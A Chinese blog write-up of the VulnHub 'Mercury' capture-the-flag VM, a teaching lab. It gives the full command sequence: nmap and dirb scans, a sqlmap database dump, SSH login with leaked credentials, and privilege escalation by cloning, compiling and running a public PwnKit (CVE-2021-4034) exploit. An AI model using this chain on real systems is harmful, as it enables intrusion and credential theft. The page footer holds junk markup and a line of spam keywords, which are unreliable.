<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之Mercury的實踐

    VSole2022-11-30 10:31:40

    今天實踐的是vulnhub的Mercury鏡像,

    下載地址,https://download.vulnhub.com/theplanets/Mercury.ova,

    先是用workstation導入,做地址掃描沒掃到地址,

    于是又用virtualbox導入,重新做地址掃描,

    sudo netdiscover -r 192.168.1.0/24,這回有地址了,105就是,

    再繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.105,

    有web服務,做目錄暴破,dirb http://192.168.1.105:8080,

    瀏覽器訪問http://192.168.1.105:8080/robots.txt,

    瀏覽器繼續訪問http://192.168.1.105:8080/*,

    瀏覽器再繼續訪問http://192.168.1.105:8080/mercuryfacts,

    點擊 Load a fact鏈接,http://192.168.1.105:8080/mercuryfacts/1/,

    猜測可以SQL注入,上sqlmap,

    sqlmap -u http://192.168.1.105:8080/mercuryfacts/ --dbs --batch,

    繼續dump數據庫,

    sqlmap -u http://192.168.1.105:8080/mercuryfacts/ -D mercury --dump-all --batch,

    獲取到用戶名密碼,webmaster/mercuryisthesizeof0.056Earths,

    ssh登錄,ssh webmaster@192.168.1.105,

    不是root,需要提權,發現另一個用戶名密碼,

    linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==,

    密碼需要base64解密,得到mercurymeandiameteris4880km,

    echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d,

    切用戶,su linuxmaster,

    雖然sudo -l發現root權限執行的程序, 但是沒法利用,

    尋找其它root權限的程序,find / -perm -u=s -type f 2>/dev/null,

    /usr/lib/policykit-1/polkit-agent-helper-1值得關注,

    從網上搜polkit,找到了提權的方案,

    進入可寫目錄,cd /tmp,下載用于提權的代碼,

    git clone https://github.com/berdav/CVE-2021-4034,

    編譯,make,執行,./cve-2021-4034,id確認是root,

    sqlmap
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    sqlmap腳本tamper使用
    2022-06-25 07:07:48
    所以有的時候我們會發現,注入成功了但是dump不出數據,很可能是select被過濾了等等原因。如何判斷使用哪個腳本最簡單的辦法就是在url參數中手工帶入關鍵詞,判斷是否被過濾。空格、等于號都沒有過濾,成功報錯。以此類推,當sqlmap注入出現問題時,比如不出數據,就要檢查對應的關鍵詞是否被過濾。
    前言21年省決賽的SQLITE注入就是用的雙寫繞過,當時是手搓代碼打的,這幾天想起來了,尋思著寫個tamper試試。一開始以為很簡單,后來才發現有很多要注意的點,折磨了挺久。等弄完才明白為什么sqlmap沒有自帶雙寫的tamper,涉及的情況太多,需要根據具體過濾邏輯來寫代碼,沒法做到統一。好,然后就是腳本的完整代碼#!
    之前有看到goby反制和松鼠A師傅蟻劍反制的文章,再想到之前寫過sqlmap的shell免殺,覺得思路其實差不多,就寫一篇sqlmap的反制吧。
    sqlmap --os-shell原理
    2021-09-24 07:04:41
    前言當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數。
    一些重要的SQLMap命令
    2023-05-04 08:55:08
    從掃描SQL注入漏洞到獲取數據庫名字、表和列,以及獲得系統訪問權限,其可被用于多種目的。我們必須給SQLMap提供有效的cookie才能對登錄頁面的POST請求進行掃描。不過別總是保持一個較高的值,因為可能會影響結果的準確性。默認情況下值為1,最高可以設置為3。值為3時,就是最大值,包含了一些嚴重的SQL查詢。級別指定要執行的檢查或payload的數量。
    Par0:楔子你站在橋上看風景,看風景的人在樓上看你,明月裝飾了你的窗子,你裝飾了別人的夢。如此形式的語句執行,實際上都是在shell中,執行bash命令。但是,bash命令中,一些使用幾率較小的特性,很多安全測試人員可能都不求甚解。
    記一次SQLmap實戰
    2021-09-28 07:41:13
    簡介:sqlmap是一個自動化的SQL注入工具,其主要功能是掃描,發現并利用給定的URL的SQL注入漏洞,目
    干貨 | sqlmap 小技巧
    2023-03-03 15:38:04
    前言在日常使用 sqlmap 中,可能我們會遇到明明手工注入能發現注入點,但是 sqlmap 發兩個包就不再往下跑了,這是怎么回事呢?案例這是一個注入點,但是 sqlmap 只發了兩個包根據上面的提示,sqlmap 應該是因為響應包狀態碼為?狀態碼正常訪問的響應:數據格式異常:這個時候最簡單的辦法,當然是通過 burp 把響應包改掉了,我們只要在 burp 新建一條自動匹配修改規則即可,讓 burp 自動把?
    為了安全起見,目標網站統一使用redacted.org進行了替代。
    測試鏈接是否能夠訪問 判斷操作系統版本 傳遞一個數組,嘗試爆絕對路徑 指定上傳路徑
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类